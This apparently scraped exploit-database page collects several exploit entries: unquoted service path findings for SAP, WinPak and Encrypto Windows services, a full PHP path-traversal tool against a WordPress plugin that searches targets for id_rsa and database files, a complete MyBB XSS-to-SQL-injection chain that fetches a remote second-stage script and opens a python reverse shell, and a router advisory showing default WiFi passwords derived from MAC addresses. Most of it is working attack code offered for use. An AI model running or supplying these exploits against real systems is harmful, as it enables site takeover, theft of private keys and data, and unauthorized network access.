ISHACK AI BOT

# Exploit Title: SAPSetup Automatic Workstation Update Service 750 - 'NWSAPAutoWorkstationUpdateSvc' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://help.sap.com/ # Software Links : https://help.sap.com/ # SAP # Tested Version: 750 Final Release # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ SAPSetup Automatic Workstation Update Service NWSAPAutoWorkstationUpdateSvc C:\Program Files (x86)\SAP\SAPsetup\Setup\Updater\NwSapAutoWorkstationUpdateService.exe Auto C:\>sc qc "NWSAPAutoWorkstationUpdateSvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NWSAPAutoWorkstationUpdateSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SAP\SAPsetup\Setup\Updater\NwSapAutoWorkstationUpdateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SAPSetup Automatic Workstation Update Service DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Winpakpro 4.8 - 'ScheduleService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak # Software Links : https://www.security.honeywell.com/product-repository/winpak # WinPackPro # Tested Version: 4.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ WIN-PAK ScheduleService ScheduleService C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe Auto C:\Users\jorge.irigoyen>sc qc "ScheduleService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CtesDurSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START <DELAYED> CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WIN-PAK Schedule Service DEPENDENCIAS : WPDatabaseService NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Winpakpro 4.8 - 'WPCommandFileService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak # Software Links : https://www.security.honeywell.com/product-repository/winpak # WinPackPro # Tested Version: 4.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ WIN-PAK WPCommandFileService WPCommandFileService C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe Auto C:\Users\jorge.irigoyen>sc qc "WPCommandFileService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CtesDurSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START <DELAYED> CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WIN-PAK Command File Service DEPENDENCIAS : WPDatabaseService NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal # Date: 19/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads # Version: <=1.6.6 # Tested on: Debian 11 # CVE : CVE-2017-1000170 # PHP version (exploit): 7.3.27 # POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php <?php $vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change $agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)", "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)", "Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321", "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4", "Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4", "Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)", "Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00", "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2", "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0", "Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6", "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0", "Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0", "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3", "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340", "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362", "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1", "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00", "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)", "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00", "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7", "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341", "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00", "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00", "Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362", "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1", "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00", "Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4", "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)", "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00", "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7", "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0", "Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00", "Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6", "Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0", "Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)", "Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00", "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0", "Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311", "Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0", "Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330", "Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"]; function post_request($url, $data, $random_agent = 0){ global $agents; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data)); #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp if($random_agent){ curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]); } $output = curl_exec($ch); curl_close($ch); return $output; } function parse_dir($str){ // by raina77ow =) $contents = array(); $startFrom = $contentStart = $contentEnd = 0; while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){ $contentStart += 5; $contentEnd = strpos($str, '">', $contentStart); if (false === $contentEnd){ break; } $contents[] = substr($str, $contentStart, $contentEnd - $contentStart); $startFrom = $contentEnd + 2; } return $contents; } function list_files($url,$path, $recursive=0,$filter){ global $vuln_file; global $recursive; global $random_agent; $exts = ""; $extensions = ""; $files = ""; (count($filter) > 0) ? $has_filter = 1 : $has_filter = 0; $parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree foreach($parsed as $file_or_folder){ if($has_filter){ foreach($filter as $filtered){ if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter echo " ".$file_or_folder."\n"; continue; } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); } continue 2; // continue the outermost foreach } } continue; // if has filter, always restart the loop here } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); }else{ echo " ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name } }else{ //is a file echo " ".$file_or_folder."\n"; } continue; } } function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain if($path == "/" && $recursive == 1){ echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can exceed the timeout limit, block your IP or even take down the server. Are you sure you want to continue? [y/N] "); $handle = fopen ("php://stdin","r"); $line = fgets($handle); if(trim(strtoupper($line)) != 'Y'){ echo "\n Aborted. Try running me without the recursion flag\n\n"; exit; } fclose($handle); echo cyan("\n\n Ok, don't say I didn't warn you...\n"); } list_files($target,$path, $recursive, $filter); } ############################################################ function green($str){ return "\e[92m".$str."\e[0m"; } function red($str){ return "\e[91m".$str."\e[0m"; } function yellow($str){ return "\e[93m".$str."\e[0m"; } function cyan($str){ return "\e[96m".$str."\e[0m"; } function banner(){ echo " _____ _ _ _ _ __ _ _______ | __ \ | (_) | | | | / _| | |__ __| | | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___ | | | |/ _ \ | |/ _` | _ \| __| _| | | | | | | ´__/ _ \/ _ \ | |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/ |_____/ \___|_|_|\__, |_| |_|\__|_| \__,_|_| |_|_| \___|\___| __/ | ".green("Coder: ").yellow("Nicholas Ferreira")." |___/ 0x7359 ".cyan("Delightful Downloads - Jquery File Tree")." Unauthenticated Path Traversal exploit ". red("\n (CVE-2017-1000170)")." "; } // ======================= CHECKING ======================= $short_args = "u:h::p:r::f:a::"; $long_args = array("url:","help::","path:","recursive::","filter:","random-agent::"); $options = getopt($short_args, $long_args); if($argc == 1){ die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n"); } if(isset($options['h']) || isset($options['help'])){ banner(); die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a] -h, --help: Show this message -u, --url: URL of target -a, --random-agent: Use random user agents -f, --filter: Name of files or extensions to search for (separated by comma) -p, --path: The full path from which the filenames will be read (default: /) -r, --recursive: Generates the tree recursivelly (be careful) e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")." | \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths (You must provide the dot to indicate it's an extension) ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")." | \-> This will search for all files named \"id_rsa\" or having the extension \".log\" within all folders of the server, with random user-agents ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")." "); } $random_agent = 0; if(isset($options['a'])){ $random_agent = 1; }elseif(isset($options['random-agent'])){ $random_agent = 1; } $target = ""; if(isset($options['u'])){ $target = $options['u']; }elseif(isset($options['url'])){ $target = $options['url']; } $recursive = 0; if(isset($options['r'])){ $recursive = 1; }elseif(isset($options['recursive'])){ $recursive = 1; } $path = "/"; if(isset($options['p'])){ $path = $options['p']; }elseif(isset($options['path'])){ $path = $options['p']; } if($path !== "/"){ if(!preg_match("#^\/.*\/$#", $path)){ $path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it } } $extensions = ""; if(isset($options['f'])){ $extensions = $options['f']; //strings }elseif(isset($options['filter'])){ $extensions = $options['filter']; //string } $filter = array(); if($extensions !== ""){ $filter = explode(",", $extensions); } // ========================= END CHECKING ========================== function is_vulnerable($url){ global $vuln_file; global $random_agent; global $filter; echo " [*] Target: ".$url."\n"; if(count($filter) > 0){ echo " [*] Filter: ".implode(", ", $filter)."\n\n"; } echo cyan(" [i] Checking if the target is vulnerable...\n"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url.$vuln_file); curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if(substr($code,0,1) == 2){ // 2xx echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n"); $post = post_request($url.$vuln_file, "/", $random_agent); if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){ echo green(" [+] Target is vulnerable! Getting file list...\n\n"); return true; } echo red(" [-] Target is not vulnerable... =(\n\n"); }else{ echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist, you don't have permission to read it or it is in another directory.\n"); } return false; } banner(); if(is_vulnerable($target)){ global $filter; alert_user($target,$path, $recursive, $filter); echo green("\n [+] Done!\n\n"); } ?>

# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 03-19-2020 # Vendor Homepage: https://macpaw.com/encrypto # Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092 # Tested Version: 1.0.1 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Encrypto Service Encrypto.Service C:\Program Files\Encrypto\Encrypto.Service.exe Auto C:\>sc qc "Encrypto.Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Encrypto.Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START (DELAYED) CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Encrypto Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution # Exploit Author: SivertPL ([email protected]) # Date: 19.03.2021 # Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval(). # Software Link: https://resources.mybb.com/downloads/mybb_1825.zip # CVE: CVE-2021-27889, CVE-2021-27890 # Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums # The exploit requires the target administrator to have a valid ACP session. # Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ # Guide: 1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target. document.write('<script src=http://localhost:8000/second_stage.js></script>'); 2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment. You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/ 3) Put the resulting encoded payload in the nested autourl vulnerability vector: [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img] 4) The final payload should look like this: [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img] 5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP. After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session. 6) Enjoy your RCE! For educational purposes only. const REVERSE_SHELL_IP = "localhost"; const REVERSE_SHELL_PORT = 5554; const PAYLOAD_XML_NAME = "payload"; const PAYLOAD_XML_VERSION = "1821"; const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"; const SHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" const SQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- "; // Trigger the actual vulnerability, force cache reload. // Stage: Final function trigger() { var request = new XMLHttpRequest(); request.open('GET', '/index.php'); request.send(); } // Poison the cache. // Stage: 6 function set_as_default(token, tid) { var request = new XMLHttpRequest(); request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token); request.onload = function() { trigger(); }; request.send(); } // Get the TID of the downloaded theme payload // Stage: 5 function get_payload_tid(token) { var request = new XMLHttpRequest(); request.open('GET', '/admin/index.php?module=style-themes'); request.responseType = "document"; request.onload = function() { var response = request.response; var aTags = response.getElementsByTagName("a"); var searchText = "payload"; var found; for (var i = 0; i < aTags.length; i++) { if (aTags[i].textContent == searchText) { found = aTags[i]; break; } } var href = found.getAttribute("href"); var urlParams = new URLSearchParams(href); var tid = urlParams.get("tid"); set_as_default(token, tid); }; request.send(); } // We pass the actual request to upload the template exploiting the second link of the exploit chain // Stage: 4 function upload_template(token) { var request = new XMLHttpRequest(); request.open('POST', '/admin/index.php?module=style-themes&action=import'); var data = new FormData(); data.append('my_post_key', token); data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml"); data.append('import', 0); data.append('url', ''); data.append('tid', '1'); data.append('name', "payload"); data.append("version_compat", 1); data.append("import_stylesheets", 1); data.append("import_templates", 1); request.onload = function() { // After uploading the template, set it as default to poison the cache get_payload_tid(token) }; request.send(data); } // Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation. // Stage: 3 function build_payload() { var xmlDom = document.implementation.createDocument("", "", null); var theme = xmlDom.createElement("theme"); theme.setAttribute("name", PAYLOAD_XML_NAME); theme.setAttribute("version", PAYLOAD_XML_VERSION); var properties = xmlDom.createElement("properties"); theme.appendChild(properties); var template_set = xmlDom.createElement("templateset"); template_set.innerHTML = SQL_PAYLOAD; properties.appendChild(template_set); xmlDom.appendChild(theme); var serialized = new XMLSerializer().serializeToString(xmlDom); var result = XML_PROLOG + serialized; var file = new File([result], PAYLOAD_XML_NAME); return file; } // Acquire the anti-CSRF token // Stage: 2 function acquire_token(request) { var response = request.response; var token = response.getElementsByName("my_post_key")[0].value; if(token == null) { /* ACP Session either expired or wasn't established to begin with */ return; } // We have acquired the anti-CSRF token now. upload_template(token); } // ACP Code Execution // Stage: 1 function exec_acp() { var request = new XMLHttpRequest(); request.open('GET', 'admin/index.php?module=style-themes&action=import'); request.responseType = "document"; request.onload = function() { acquire_token(request); }; request.send(); } // We hide the payload, to raise less suspicions // Stage: 0 function hide() { var getAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']"); getAll.forEach(element => { var pNode = element.parentNode.innerText="lmao whatever you say"; }); } // Entry point of the exploit function start() { hide(); exec_acp(); } start();

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device generates its SSID and password based on the WAN MAC address. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5638 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php 03.02.2021 -- Example defaults: # ifconfig |grep HWaddr br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01 ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C SSID1=MyWiFi-167C5D SSID1=MyWiFi-5G-167C5D WiFi password = EF167C5D

